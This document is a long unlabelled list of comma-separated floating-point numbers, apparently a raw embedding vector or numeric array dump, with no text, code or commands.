-0.029735777527093887, 0.041699107736349106, 0.0006821039714850485, 0.02034628950059414, -0.005039840470999479, -0.015903176739811897, 0.009310404770076275, -0.02141033485531807, -0.01732669770717621, 0.02362470142543316, -0.0026708997320383787, 0.00031049660174176097, -0.004935592878609896, -0.017887478694319725, 0.02385476604104042, -0.0017668199725449085, -0.022330591455101967, 0.010978369042277336, -0.044316086918115616, 0.0045617385767400265, 0.0001305343903368339, 0.009202562272548676, 0.001060451497323811, 0.01555808074772358, 0.005985260009765625, -0.005751600954681635, -0.002643939107656479, 0.01724042370915413, 0.002329398412257433, -0.007606492377817631, -0.005870227701961994, -0.009698637761175632, 0.000921154860407114, -0.0062620555981993675, 0.026716187596321106, -0.03427954390645027, 0.002178418915718794, 0.031547531485557556, 0.019785508513450623, 0.002917140256613493, -0.012890775687992573, 0.012905155308544636, 0.005992449354380369, 0.008339821361005306, -0.03209393471479416, -0.033445559442043304, 0.017844341695308685, 0.022690067067742348, 0.005309446714818478, -0.007592113688588142, -0.003100472502410412, -0.01159666571766138, 0.007965967990458012, -0.013422799296677113, -0.006948653142899275, -0.0038104357663542032, 0.013243061490356922, -0.028930554166436195, -0.010561377741396427, -0.007455512881278992, 0.0000771748018451035, -0.048917368054389954, -0.012804501689970493, -0.034509606659412384, -0.010690788738429546, -0.015529323369264603, 0.00012873701052740216, 0.039829839020967484, 0.01893714629113674, -0.021669156849384308, 0.0029818457551300526, 0.005888201761990786, -0.02119464986026287, -0.010640461929142475, -0.009238509461283684, -0.009001255966722965, -0.029678262770175934, 0.004080042243003845, 0.03120243549346924, -0.05064284801483154, -0.03200766071677208, -0.006211729254573584, 0.01990053988993168, -0.015054816380143166, -0.020188119262456894, 0.00020445144036784768, -0.03275536745786667, 0.014810373075306416, 0.0536336824297905, -0.005773169454187155, 0.037701744586229324, 0.013329335488379002, -0.008382958360016346, 0.030569760128855705, -0.0071247960440814495, -0.0069738165475428104, 0.005273499526083469, -0.011510391719639301, 0.007268585730344057, 0.02673056721687317, 0.027593307197093964, 0.015011679381132126, 0.006391466595232487, -0.025968478992581367, -0.01619075797498226, 0.011877056211233139, -0.0200874675065279, -0.03068479150533676, -0.013688811101019382, -0.025206392630934715, -0.009439815767109394, 0.029764536768198013, 0.023912282660603523, -0.0044395169243216515, 0.005277093965560198, 0.03445209190249443, -0.008231978863477707, -0.0013633092166855931, -0.015356775373220444, 0.003506679320707917, -0.0074483235366642475, 0.024501821026206017, 0.012286857701838017, 0.015946313738822937, 0.01795937493443489, 0.01685219071805477, -0.040059901773929596, -0.0010245039593428373, 0.006520877592265606, 0.01915283128619194, 0.023394636809825897, -0.012473785318434238, -0.02549397200345993, 0.02198549546301365, 0.03241027146577835, 0.008131326176226139, -0.030799824744462967, -0.005996044259518385, 0.003585763741284609, -0.024228619411587715, -0.00035722836037166417, 0.03427954390645027, 0.002778742229565978, -0.023452153429389, -0.000016583595424890518, 0.011301896534860134, 0.022862615063786507, -0.029937084764242172, 0.014767236076295376, -0.012020846828818321, -0.001840512384660542, -0.0020957395900040865, 0.00077152339508757, -0.012890775687992573, 0.004453896079212427, -0.00397938909009099, 0.012883586809039116, -0.012229342013597488, 0.022934509441256523, -0.008375769481062889, -0.03281288594007492, 0.012186205014586449, -0.00342939211986959, -0.0018692703451961279, -0.014896647073328495, -0.0064238193444907665, 0.003900304436683655, -0.0058163064531981945, 0.004960755817592144, -0.0003983433125540614, 0.021381577476859093, -0.006747347302734852, 0.019210347905755043, -0.0008034267812035978, 0.000756695051677525, 0.0011179674183949828, -0.03143250197172165, 0.009957459755241871, 0.034423332661390305, -0.018865251913666725, 0.007354860194027424, 0.007441134192049503, -0.009252888150513172, -0.00038980579120106995, 0.011265948414802551, 0.006538851652294397, -0.001552033587358892, -0.003344915574416518, -0.016348926350474358, -0.008210410363972187, -0.0056545427069067955, -0.005877417512238026, 0.008009104989469051, -0.015486186370253563, -0.022143663838505745, 0.008440474979579449, -0.0164495799690485, -0.009353541769087315, -0.003681024769321084, -0.040232449769973755, -0.0005917858215980232, 0.010726735927164555, 0.010611704550683498, -0.03560240939259529, 0.022690067067742348, 0.014393381774425507, -0.019483549520373344, -0.029448198154568672, 0.027363242581486702, 0.010245039127767086, -0.03568868339061737, 0.015054816380143166, 0.02581031061708927, -0.009123477153480053, 0.011733266524970531, -0.028269119560718536, 0.021510988473892212, -0.0036468745674937963, 0.022992026060819626, 0.006287219002842903, 0.01405547559261322, 0.010324124246835709, -0.004234616179019213, 0.03505600988864899, -0.036465153098106384, -0.006758131552487612, 0.011366602033376694, -0.01759989932179451, 0.010072491131722927, -0.007930019870400429, 0.005589837208390236, -0.0232364684343338, 0.03709782660007477, -0.01555808074772358, -0.0031364199239760637, 0.008052241988480091, -0.008979687467217445, 0.0016122456872835755, -0.025479592382907867, 0.048255935311317444, 0.037126585841178894, 0.03010963276028633, 0.023883523419499397, -0.0463579036295414, 0.0048744818195700645, 0.010094059631228447, 0.052023231983184814, 0.02788088656961918, 0.002938708756119013, 0.01154633890837431, -0.004852913320064545, -0.030799824744462967, 0.017887478694319725, 0.004515006672590971, -0.017901858314871788, 0.011258759535849094, -0.01396201178431511, -0.01600383035838604, -0.012818881310522556, -0.00021871810895390809, 0.01964171789586544, -0.01817505992949009, 0.03192138671875, -0.004169910680502653, 0.001057755434885621, -0.02300640381872654, -0.019843023270368576, -0.02319333143532276, 0.023610321804881096, 0.004842129070311785, 0.03379065543413162, 0.0227475818246603, 0.02522077038884163, 0.010338502936065197, -0.002291653538122773, -0.018477018922567368, 0.0025253123603761196, 0.027952780947089195, -0.01875022053718567, -0.03902461379766464, -0.019569823518395424, 0.006441793404519558, -0.035889990627765656, 0.006283624097704887, -0.00022781731968279928, 0.03951349854469299, 0.01186267752200365, -0.02632795460522175, -0.0071643381379544735, 0.00767119787633419, 0.010647651739418507, 0.006873163394629955, -0.0028236766811460257, -0.018764598295092583, -0.002616978483274579, 0.03890958055853844, -0.0236678384244442, -0.015457428060472012, -0.0018171464325860143, -0.013739136978983879, -0.015860039740800858, -0.019799886271357536, 0.05918397754430771, -0.005618595518171787, 0.029764536768198013, 0.028168465942144394, -0.012286857701838017, 0.0003576776944100857, -0.031231194734573364, -0.009856806136667728, 0.0026816839817911386, 0.021165892481803894, 0.016837812960147858, 0.006240487098693848, -0.00009374436194775626, 0.040318723767995834, -0.03505600988864899, -0.005029056221246719, -0.010956800542771816, -0.02681684121489525, -0.01407704409211874, -0.03177759796380997, -0.023782871663570404, 0.007728714030236006, -0.030713550746440887, 0.053662437945604324, 0.048169661313295364, -0.013092081993818283, -0.016751538962125778, 0.014752857387065887, 0.018649566918611526, 0.006103886757045984, -0.009094719775021076, -0.0058163064531981945, -0.008850276470184326, -0.016478337347507477, 0.046530451625585556, -0.0227475818246603, 0.014616256579756737, -0.021697916090488434, -0.0008474625064991415, 0.02004433050751686, -0.0037457302678376436, -0.03413575142621994, 0.0005149480421096087, 0.0029710615053772926, -0.026083510369062424, -0.01209993101656437, 0.03381941467523575, -0.002890179632231593, 0.01915283128619194, -0.0001984976406674832, -0.020863933488726616, -0.021482231095433235, -0.009303214959800243, 0.021122755482792854, -0.0200874675065279, 0.016765916720032692, -0.01772931031882763, -0.008418906480073929, -0.005374152213335037, -0.029505714774131775, 0.014781614765524864, -0.014795994386076927, 0.0054244790226221085, -0.018376365303993225, -0.017139771953225136, 0.017182908952236176, -0.027895266190171242, -0.04319452494382858, 0.004802586976438761, 0.02123778685927391, -0.0034671369940042496, -0.020720142871141434, 0.010719547048211098, 0.008469232358038425, -0.010949610732495785, -0.0032532494515180588, 0.02204301208257675, -0.02217242307960987, 0.00685878423973918, 0.009245699271559715, 0.03177759796380997, 0.009367920458316803, 0.030713550746440887, 0.038679517805576324, 0.0011943558929488063, -0.009835237637162209, 0.014853510074317455, 0.01564435474574566, 0.00793720968067646, 0.022618170827627182, -0.0016769511858001351, 0.013688811101019382, 0.0028883821796625853, 0.026385469362139702, 0.006459766998887062, -0.003549816319718957, 0.014795994386076927, 0.0024048881605267525, -0.011337843723595142, -0.007642440032213926, -0.0068300263956189156, -0.008418906480073929, 0.009260077960789204, -0.0027050499338656664, -0.014688151888549328, 0.003806841094046831, 0.011186864227056503, 0.02743513695895672, 0.034423332661390305, -0.007096037734299898, 0.017125392332673073, -0.0023994960356503725, -0.027607684955000877, -0.022589413449168205, 0.002286261413246393, 0.02660115621984005, 0.023509670048952103, -0.0027356052305549383, -0.013329335488379002, 0.024501821026206017, -0.0036037375684827566, 0.005859443452209234, 0.014335866086184978, -0.024458684027194977, 0.016161998733878136, -0.0018180451588705182, -0.03807559981942177, 0.013027376495301723, -0.009892754256725311, 0.0032640337012708187, -0.0017380620120093226, 0.011496013030409813, 0.030713550746440887, 0.02434365265071392, -0.01857767254114151, 0.0358324758708477, -0.03200766071677208, -0.004302916582673788, 0.014199265278875828, 0.01923910528421402, -0.048169661313295364, 0.017614278942346573, -0.030742308124899864, -0.021669156849384308, 0.013782273977994919, 0.02811095118522644, 0.010187523439526558, -0.0011323464568704367, 0.00151339010335505, 0.03321549668908119, -0.01194895152002573, 0.0031597858760505915, -0.008303874172270298, 0.02079203724861145, -0.025738414376974106, -0.0014504819409921765, -0.008009104989469051, 0.013494694605469704, -0.0022485165391117334, 0.0038715465925633907, 0.027147557586431503, -0.0019717207178473473, -0.006154213100671768, -0.005309446714818478, -0.009497331455349922, 0.030080873519182205, 0.02256065607070923, -0.017743689939379692, -0.00784374587237835, 0.0011233595432713628, 0.00816008448600769, 0.014982921071350574, -0.028139708563685417, -0.008145704865455627, -0.004453896079212427, 0.0027356052305549383, -0.00782217737287283, -0.009540468454360962, -0.019699234515428543, 0.0020508053712546825, 0.012840449810028076, 0.02181294746696949, -0.01706787571310997, 0.02904558554291725, 0.00951171014457941, -0.02753579057753086, -0.015500565059483051, -0.02898806892335415, 0.0013264630688354373, 0.022100526839494705, -0.022416865453124046, 0.0036073322407901287, 0.03862200304865837, 0.009504521265625954, -0.018822114914655685, -0.022992026060819626, 0.0020382236689329147, -0.0012869207421317697, 0.00951171014457941, 0.021007724106311798, -0.017628656700253487, 0.002920734928920865, 0.0358324758708477, 0.007336886133998632, 0.03117367811501026, -0.013616915792226791, 0.02872924692928791, 0.012574438005685806, -0.007520218379795551, -0.02368221804499626, -0.0009445207542739809, -0.08092502504587173, -0.0023491696920245886, -0.012574438005685806, 0.042763154953718185, 0.011711698025465012, -0.007807798683643341, 0.020504457876086235, -0.02934754453599453, 0.02987956814467907, 0.022330591455101967, -0.008670538663864136, -0.010568567551672459, -0.015716250985860825, -0.0034833133686333895, 0.024731885641813278, 0.052023231983184814, -0.020144982263445854, -0.00044170499313622713, -0.011280328035354614, -0.0023743328638374805, -0.006819242145866156, -0.00402252608910203, 0.009669879451394081, -0.00811694748699665, -0.026457365602254868, 0.01627703197300434, -0.018922768533229828, -0.009547658264636993, 0.01046072505414486, 0.011869867332279682, -0.007656819187104702, -0.008814328350126743, -0.006725778803229332, 0.023107057437300682, -0.006103886757045984, -0.011819540522992611, -0.024544958025217056, 0.023926660418510437, -0.016607748344540596, 0.019311001524329185, -0.00037362941657193005, -0.031892627477645874, -0.024846917018294334, 0.026097889989614487, -0.005999639164656401, 0.021022101864218712, 0.008886223658919334, -0.02996584214270115, 0.0231789518147707, 0.007606492377817631, 0.023078300058841705, -0.011143727228045464, -0.013293388299643993, -0.03370438143610954, -0.02115151286125183, 0.0007283863378688693, -0.02106523886322975, -0.01396201178431511, -0.02606913261115551, 0.008569885976612568, 0.06401532143354416, 0.006136239506304264, -0.0052519310265779495, -0.01732669770717621, 0.009677069261670113, -0.00018344461568631232, -0.020490078255534172, -0.0035839665215462446, -0.02836977317929268, -0.004162721335887909, 0.026299195364117622, 0.01146006491035223, -0.015860039740800858, 0.008670538663864136, 0.03200766071677208, -0.014235212467610836, -0.020691385492682457, -0.01002216525375843, 0.028887417167425156, 0.012028035707771778, -0.03341680392622948, 0.012660712003707886, 0.014795994386076927, -0.013760705478489399, 0.012739796191453934, -0.0031723675783723593, 0.019210347905755043, 0.00396860484033823, -0.00153495860286057, 0.002208974212408066, -0.030713550746440887, 0.01385416928678751, 0.02168353646993637, 0.0013282604049891233, -0.014645014889538288, -0.000764783238992095, 0.013034566305577755, 0.013904496096074581, -0.0017569344490766525, -0.017456108704209328, 0.008670538663864136, 0.0027356052305549383, -0.016147620975971222, -0.05432387441396713, -0.003105864627286792, 0.010072491131722927, 0.0067725102417171, -0.0025055413134396076, -0.008145704865455627, -0.02540769800543785, -0.0046731759794056416, 0.004615659825503826, 0.015414291061460972, -0.010288176126778126, 0.008260737173259258, 0.03928343579173088, 0.014882268384099007, 0.004407164175063372, 0.03002335876226425, -0.000919357524253428, -0.01711101271212101, 0.002446227939799428, -0.020950207486748695, -0.014443708583712578, -0.006955842487514019, 0.00486729247495532, -0.03077106550335884, -0.0028128924313932657, 0.002169432118535042, 0.011783592402935028, -0.039829839020967484, 0.014558739960193634, 0.01902342028915882, -0.008426095359027386, 0.029146239161491394, 0.01150320190936327, 0.011797972023487091, 0.04405726492404938, -0.02615540660917759, -0.007922830991446972, 0.03206517547369003, 0.015500565059483051, -0.010417587123811245, 0.014199265278875828, -0.0014163317391648889, 0.008009104989469051, 0.006970221642404795, -0.01857767254114151, -0.01227966882288456, -0.029448198154568672, 0.012596006505191326, -0.009986217133700848, 0.020605111494660378, -0.0008043254492804408, 0.0025792336091399193, 0.010101249441504478, 0.02740637958049774, 0.016118861734867096, -0.016104483976960182, 0.007505839690566063, -0.0011107779573649168, -0.01043915655463934, 0.0242142416536808, 0.0028344609308987856, -0.007987536489963531, -0.02256065607070923, 0.00017355906311422586, 0.007185906637459993, 0.015931935980916023, -0.004863697569817305, -0.011280328035354614, -0.004691149573773146, 0.01345874648541212, -0.013336525298655033, 0.014702530577778816, 0.016291409730911255, -0.002749984385445714, 0.010942420922219753, 0.01657899096608162, -0.02238810807466507, -0.01857767254114151, -0.02198549546301365, 0.01159666571766138, -0.03652266785502434, 0.014314297586679459, -0.0051980093121528625, -0.000613803684245795, 0.005273499526083469, -0.0022808692883700132, 0.006786889396607876, 0.033761899918317795, -0.014450897462666035, 0.013667242601513863, -0.039398469030857086, 0.012696659192442894, -0.01777244731783867, 0.040980156511068344, -0.022675687447190285, -0.010295365937054157, 0.00699538504704833, -0.03591874986886978, 0.024286136031150818, 0.005888201761990786, 0.0232364684343338, 0.014307107776403427, -0.01747048832476139, 0.0246456116437912, -0.008073810487985611, -0.004083636682480574, 0.019440412521362305, -0.008037862367928028, 0.0037637040950357914, 0.016334546729922295, -0.004432327579706907, 0.008239168673753738, 0.021755430847406387, -0.002649331232532859, 0.02292012982070446, 0.012711038812994957, -0.02624168060719967, -0.012423458509147167, -0.002751781605184078, 0.017758067697286606, 0.004698339384049177, -0.015328017063438892, 0.03183511272072792, 0.019311001524329185, -0.011999278329312801, -0.01985740289092064, -0.02287699282169342, 0.007383618038147688, -0.02677370421588421, -0.008447663858532906, -0.002760768635198474, 0.02455933764576912, 0.026701807975769043, -0.01367443148046732, 0.05590556189417839, -0.013710379600524902, -0.029822051525115967, -0.008706485852599144, 0.0011440294329077005, 0.013034566305577755, -0.005722843110561371, 0.0010397816076874733, -0.016248272731900215, 0.012711038812994957, -0.019397275522351265, -0.019828645512461662, 0.014026717282831669, 0.015126710757613182, 0.03476842865347862, -0.01893714629113674, -0.03873703256249428, 0.0057767643593251705, -0.0018764599226415157, 0.0048061818815767765, 0.008325442671775818, -0.01186267752200365, -0.016205135732889175, -0.0046839602291584015, 0.008584264665842056, 0.010748304426670074, 0.01405547559261322, -0.012430648319423199, -0.020907070487737656, -0.020375046879053116, -0.007556166034191847, 0.014048285782337189, -0.01367443148046732, -0.0024030909407883883, -0.0022521112114191055, -0.012897965498268604, -0.004601281136274338, -0.012711038812994957, 0.013386852107942104, -0.025062602013349533, -0.010072491131722927, 0.016248272731900215, -0.002602599561214447, 0.012818881310522556, 0.010604514740407467, -0.011287516914308071, -0.008857465349137783, -0.014939784072339535, 0.002769755432382226, 0.03594750538468361, -0.002717631636187434, 0.017039118334650993, 0.020231256261467934, 0.006883947644382715, -0.004612065386027098, 0.006520877592265606, 0.0021388765890151262, 0.008102567866444588, 0.002634952310472727, -0.015946313738822937, -0.007293749134987593, 0.00681564724072814, -0.0060607497580349445, 0.013005807995796204, -0.013422799296677113, 0.0007270383066497743, 0.03338804468512535, -0.002446227939799428, -0.0002493858337402344, -0.0001836692972574383, 0.013293388299643993, 0.0066682626493275166, 0.019052179530262947, -0.0013426394434645772, 0.005032651126384735, 0.0024264566600322723, -0.009123477153480053, -0.0062620555981993675, -0.0016454971628263593, 0.015141090378165245, 0.008325442671775818, 0.00955484714359045, -0.017585519701242447, 0.038995854556560516, 0.005259120371192694, 0.027636444196105003, -0.001520579564385116, -0.00008183674799511209, -0.006499309092760086, -0.0022305427119135857, 0.0023671432863920927, -0.014601877890527248, 0.0079803466796875, -0.007128390483558178, 0.021266546100378036, -0.028571078553795815, -0.0025846257340162992, -0.014544361270964146, -0.004263374488800764, 0.0057372222654521465, 0.013509073294699192, 0.01197052001953125, 0.007149958983063698, 0.006488524843007326, 0.03134622797369957, 0.0012833259534090757, -0.012495353817939758, -0.032122693955898285, -0.02504822239279747, 0.012603196315467358, 0.010273797437548637, 0.02349529042840004, -0.024444304406642914, -0.003817625343799591, 0.021266546100378036, -0.03301418945193291, 0.011014316231012344, 0.02336587943136692, 0.02000119350850582, 0.0003179107734467834, -0.0043604327365756035, -0.00828949548304081, 0.017355456948280334, -0.010590136051177979, 0.020317530259490013, 0.026097889989614487, -0.002600802108645439, -0.02313581481575966, 0.010511050932109356, 0.006247676908969879, -0.020820796489715576, 0.0028614215552806854, -0.01609010435640812, -0.002446227939799428, 0.01418488658964634, -0.03890958055853844, -0.011819540522992611, -0.01021628174930811, -0.025436455383896828, -0.010475103743374348, -0.0019519496709108353, 0.004335269331932068, -0.0042669689282774925, -0.011963330209255219, 0.013120840303599834, -0.0030159959569573402, -0.005780359264463186, -0.013207114301621914, -0.0034994897432625294, -0.01017314475029707, -0.007599303033202887, -0.03028218075633049, -0.015299258753657341, -0.00017749081598594785, 0.0280678141862154, -0.003524653147906065, 0.0237253550440073, -0.010403208434581757, 0.00789407268166542, 0.030914856120944023, -0.004939187318086624, 0.005115330219268799, -0.007965967990458012, -0.01711101271212101, 0.03356059268116951, -0.009252888150513172, 0.04388471692800522, 0.00022433491540141404, -0.011301896534860134, 0.035487379878759384, -0.0043891905806958675, -0.0026924682315438986, -0.014472465962171555, 0.002131687244400382, -0.012667901813983917, -0.020993344485759735, 0.022402485832571983, -0.01808878593146801, -0.003932657185941935, 0.009389488957822323, 0.030972372740507126, 0.02522077038884163, 0.000773770094383508, -0.009583605453372002, 0.017887478694319725, -0.02526390738785267, -0.024731885641813278, -0.0021748242434114218, 0.005104545969516039, 0.03494097664952278, 0.0007409679819829762, 0.010999937541782856, -0.004648012574762106, 0.005162062123417854, 0.013092081993818283, 0.014867888763546944, 0.018721461296081543, 0.004626444075256586, 0.02996584214270115, 0.024746263399720192, -0.0045617385767400265, 0.03310046344995499, 0.023509670048952103, 0.0051404936239123344, -0.01636330597102642, -0.010367261245846748, -0.043740928173065186, -0.0060319919139146805, -0.0036181164905428886, -0.007034927140921354, -0.007721524685621262, -0.0011350425193086267, 0.007121201138943434, 0.006945058237761259, -0.02579593099653721, 0.02402731403708458, 0.008677728474140167, -0.0022593007888644934, -0.012876396998763084, 0.004860103130340576, -0.004058473743498325, -0.021697916090488434, 0.00006655905599473044, 0.0013237670063972473, 0.007836556993424892, 0.00831106398254633, 0.008476422168314457, 0.034739669412374496, 0.013358093798160553, -0.01203522551804781, -0.016161998733878136, 0.005924149416387081, -0.011014316231012344, 0.024458684027194977, 0.0034689344465732574, 0.011007126420736313, -0.03413575142621994, -0.005848659202456474, 0.015083573758602142, 0.021913601085543633, 0.01813192293047905, -0.000922952254768461, 0.002171229338273406, -0.021050861105322838, -0.011071831919252872, -0.008382958360016346, -0.02181294746696949, 0.051850683987140656, -0.022661307826638222, -0.0023419801145792007, -0.019742371514439583, -0.013307766988873482, 0.004737881477922201, -0.01348031498491764, -0.00524114677682519, -0.009914322756230831, 0.010841768234968185, -0.016952844336628914, -0.014414950273931026, -0.008526748977601528, 0.0048169661313295364, -0.002158647868782282, -0.009540468454360962, 0.020461320877075195, -0.012373131699860096, 0.00995026994496584, 0.006431009154766798, -0.005489184521138668, 0.0074195656925439835, 0.005395720712840557, -0.010115628130733967, -0.018721461296081543, 0.0099071329459548, 0.019799886271357536, 0.008742433972656727, -0.00014491338515654206, -0.012991429306566715, -0.009260077960789204, 0.01649271696805954, 0.015802524983882904, -0.009439815767109394, 0.0008425196865573525, 0.03959977254271507, -0.0018836493836715817, -0.000931939110159874, 0.019497927278280258, 0.02283385582268238, 0.001672457787208259, -0.0026421418879181147, -0.013954821974039078, -0.00019950866408180445, -0.01394044328480959, -0.026931872591376305, 0.014292729087173939, 0.012135878205299377, 0.005503563210368156, 0.0028524347580969334, 0.0000921154860407114, -0.0011575097450986505, 0.0037780830170959234, -0.0054244790226221085, -0.0015124913770705462, 0.0014226225903257728, 0.02159726247191429, -0.003262236248701811, -0.022373728454113007, -0.002036426216363907, -0.020605111494660378, 0.028341013938188553, -0.0028668136801570654, 0.002780539682134986, -0.010014975443482399, 0.007685577031224966, -0.006693426053971052, 0.004737881477922201, 0.011510391719639301, 0.009411057457327843, 0.009353541769087315, 0.008339821361005306, 0.029649503529071808, 0.013429989106953144, 0.006502903997898102, -0.02353842742741108, -0.004515006672590971, -0.00010621365072438493, 0.01154633890837431, -0.013624105602502823, -0.000764783238992095, 0.010331313125789165, -0.012998618185520172, 0.004755855072289705, -0.002775147557258606, -0.006786889396607876, -0.010575756430625916, -0.014997299760580063, -0.02159726247191429, 0.012567248195409775, 0.0193253792822361, -0.011603855527937412, 0.003684619441628456, -0.008275115862488747, 0.00015996641013771296, -0.005381342023611069, 0.030167147517204285, 0.007973156869411469, 0.01636330597102642, -0.012545679695904255, 0.004759449977427721, 0.010841768234968185, -0.0004021627246402204, 0.011122158728539944, 0.005960096605122089, -0.013329335488379002, 0.013890116475522518, 0.015399912372231483, -0.0029710615053772926, -0.012833259999752045, 0.013077703304588795, 0.03174883872270584, -0.002927924506366253, 0.0074770813807845116, 0.015673113986849785, -0.017211666330695152, 0.008188841864466667, -0.04385595768690109, -0.014522792771458626, -0.01370318979024887, 0.02136719785630703, -0.005934933666139841, -0.015658734366297722, -0.010892095044255257, -0.0065064989030361176, 0.017700552940368652, -0.015241743065416813, 0.0046552023850381374, 0.002474985783919692, 0.002757173730060458, -0.014386191964149475, 0.0064346035942435265, 0.014062664471566677, 0.0005796535406261683, -0.014824751764535904, 0.027852129191160202, 0.01732669770717621, -0.012962670996785164, 0.01653585396707058, -0.001685039373114705, 0.014716909267008305, 0.0014747465029358864, -0.0005935832159593701, 0.028441667556762695, -0.0015008084010332823, -0.009109098464250565, 0.002266490366309881, -0.0018692703451961279, -0.003330536652356386, 0.006103886757045984, -0.007272180635482073, 0.0006340241525322199, 0.007362049538642168, -0.013077703304588795, 0.004662391729652882, 0.011194054037332535, -0.0035102739930152893, -0.008857465349137783, -0.017499245703220367, 0.010101249441504478, 0.005924149416387081, 0.0010182131081819534, 0.010748304426670074, -0.00036194646963849664, -0.002800310729071498, 0.002158647868782282, 0.024487441405653954, 0.002271882491186261, -0.004612065386027098, -0.006822837051004171, -0.007814988493919373, -0.0031579884234815836, -0.012365942820906639, -0.018146302551031113, -0.001228506094776094, 0.008275115862488747, -0.007397997193038464, 0.0023563590366393328, -0.01853453554213047, -0.0021029291674494743, -0.019713612273335457, 0.015960693359375, 0.021093998104333878, -0.015054816380143166, -0.013185545802116394, -0.009828048758208752, 0.022316211834549904, -0.005201604217290878, -0.004863697569817305, 0.007207475136965513, 0.014522792771458626, 0.01186267752200365, 0.015486186370253563, -0.006790484301745892, -0.02913185954093933, -0.010424776934087276, 0.015931935980916023, -0.005708463955670595, 0.0023976988159120083, 0.004493438173085451, -0.004870887380093336, -0.0052087935619056225, 0.008260737173259258, -0.024703126400709152, 0.024717506021261215, -0.001681444700807333, 0.00833263248205185, -0.007243422791361809, -0.0011566110188141465, -0.004177100490778685, -0.008454853668808937, 0.031087404116988182, -0.0014603674644604325, 0.001996884122490883, 0.007275775540620089, 0.006247676908969879, -0.017758067697286606, -0.0074195656925439835, -0.0023851171135902405, 0.004374811425805092, -0.004202263429760933, 0.001836917595937848, 0.019339758902788162, 0.02017374150454998, -0.014724099077284336, -0.002124497666954994, 0.026385469362139702, -0.024775022640824318, -0.005226767621934414, 0.0015718047507107258, 0.023293985053896904, -0.02304954081773758, 0.002591815311461687, -0.004018931183964014, 0.023869145661592484, -0.012617575004696846, -0.0051980093121528625, 0.018290091305971146, 0.015500565059483051, -0.0039542256854474545, 0.01994367688894272, -0.002144268713891506, -0.0019195969216525555, 0.02468874864280224, -0.0020723738707602024, 0.010733925737440586, 0.004202263429760933, 0.017714930698275566, -0.020029950886964798, 0.017844341695308685, -0.0028578268829733133, 0.002480377908796072, 0.015500565059483051, -0.006474146153777838, -0.0010541606461629272, -0.009353541769087315, 0.03292791545391083, 0.005248336121439934, 0.025436455383896828, -0.004162721335887909, -0.007282964885234833, -0.01619075797498226, 0.013739136978983879, 0.0065460409969091415, 0.00397938909009099, -0.0036001428961753845, 0.0023635486140847206, 0.013681621290743351, -0.0032586415763944387, -0.0025576651096343994, -0.008742433972656727, -0.026946252211928368, 0.0061002918519079685, -0.0031903411727398634, 0.005845064762979746, -0.01197052001953125, 0.022761961445212364, -0.0012033428065478802, 0.02832663618028164, 0.012768554501235485, -0.009482952766120434, -0.011805160902440548, -0.012574438005685806, -0.012624764814972878, 0.011244379915297031, 0.005237551871687174, 0.010633273050189018, -0.004946377128362656, 0.00392546784132719, -0.011150917038321495, -0.005499968770891428, -0.00004426036684890278, 0.010475103743374348, -0.016636505722999573, 0.009310404770076275, 0.01866394653916359, -0.006808457896113396, 0.006244082003831863, 0.023524047806859016, -0.0020705764181911945, -0.02026001550257206, -0.01613324135541916, -0.008713675662875175, -0.018462639302015305, -0.0016697617247700691, -0.0007921931683085859, 0.008318252861499786, 0.02691749297082424, 0.013681621290743351, -0.0060607497580349445, -0.00002485433105903212, -0.0008694803109392524, 0.010122817941009998, -0.03790305182337761, 0.0034347842447459698, 0.017226045951247215, -0.0007113112951628864, 0.0015780956018716097, 0.006959437392652035, -0.008792759850621223, -0.013624105602502823, 0.010971179232001305, -0.0231789518147707, 0.020029950886964798, -0.014551551081240177, 0.010094059631228447, -0.008217600174248219, 0.02149660885334015, 0.012409079819917679, 0.004464680328965187, 0.015716250985860825, 0.010848958045244217, 0.011122158728539944, -0.00019299317500554025, 0.0006883947644382715, -0.013760705478489399, 0.003549816319718957, 0.009878374636173248, 0.005967286415398121, -0.020533215254545212, 0.020446941256523132, 0.001395661965943873, 0.0007144567207433283, 0.0009831642964854836, -0.032899159938097, -0.0029081532265990973, -0.013667242601513863, -0.007527408190071583, 0.025781551375985146, 0.0023437775671482086, 0.013465936295688152, -0.009116288274526596, 0.004568928387016058, -0.0031759622506797314, 0.0023851171135902405, 0.004870887380093336, -0.0011170688085258007, 0.0005176441045477986, -0.0015933732502162457, -0.0016634708736091852, 0.013199924491345882, 0.0348547026515007, 0.01558683905750513, 0.004191479180008173, 0.005471210461109877, -0.010590136051177979, 0.002800310729071498, -0.004417948424816132, -0.0034851108212023973, -0.01915283128619194, 0.00771433487534523, -0.00008543150033801794, -0.009698637761175632, -0.00012840000272262841, 0.029059965163469315, -0.018778977915644646, 0.005708463955670595, -0.01215025782585144, 0.003071714425459504, -0.0031112567521631718, -0.0017740094335749745, 0.022891372442245483, -0.004072852432727814, 0.004295727238059044, -0.0017380620120093226, 0.01174764521420002, -0.008174463175237179, 0.014925405383110046, -0.004852913320064545, -0.01951230689883232, -0.012919533997774124, 0.0034905029460787773, -0.03807559981942177, -0.0022179612424224615, 0.023782871663570404, -0.02536456100642681, 0.012847638688981533, 0.0039038993418216705, 0.027636444196105003, 0.01570187136530876, 0.01190581452101469, -0.024746263399720192, 0.010446345433592796, -0.021439094096422195, 0.01152477040886879, -0.006981005892157555, -0.0025936125312000513, -0.020892690867185593, -0.008950929157435894, -0.03781677782535553, -0.006359113845974207, -0.01159666571766138, 0.0027050499338656664, -0.00015491129306610674, 0.00951171014457941, 0.021654779091477394, 0.015011679381132126, 0.019124073907732964, -0.001206937595270574, 0.001212329720146954, 0.01396920159459114, -0.01230123732239008, -0.006528067402541637, 0.024731885641813278, -0.0006672756280750036, -0.00970582664012909, 0.002277274616062641, 0.002909950679168105, -0.008548317477107048, -0.014235212467610836, 0.014882268384099007, -0.0069630322977900505, -0.02132406085729599, -0.00015030551003292203, 0.0012833259534090757, -0.0034060264006257057, -0.006937868893146515, -0.0017713133711367846, 0.009454194456338882, -0.03128870949149132, -0.018505776301026344, -0.002462404314428568, 0.01000059675425291, 0.002031034091487527, -0.021870464086532593, 0.00002307099748577457, -0.008497990667819977, 0.0028308662585914135, -0.0011862677056342363, 0.015011679381132126, -0.0034635423216968775, -0.013731948100030422, -0.026658670976758003, -0.005510753020644188, -0.010798631235957146, -0.0017919832607731223, 0.013739136978983879, -0.004766639322042465, -0.021784190088510513, 0.0066682626493275166, -0.007189501542598009, 0.003975794184952974, -0.007541786879301071, 0.02176981046795845, 0.005942123010754585, -0.028470424935221672, -0.029361924156546593, -0.004087231587618589, 0.007214664481580257, 0.023394636809825897, 0.015256121754646301, 0.0033125628251582384, -0.0017991727218031883, 0.020331909880042076, 0.020446941256523132, 0.017456108704209328, -0.006456172093749046, 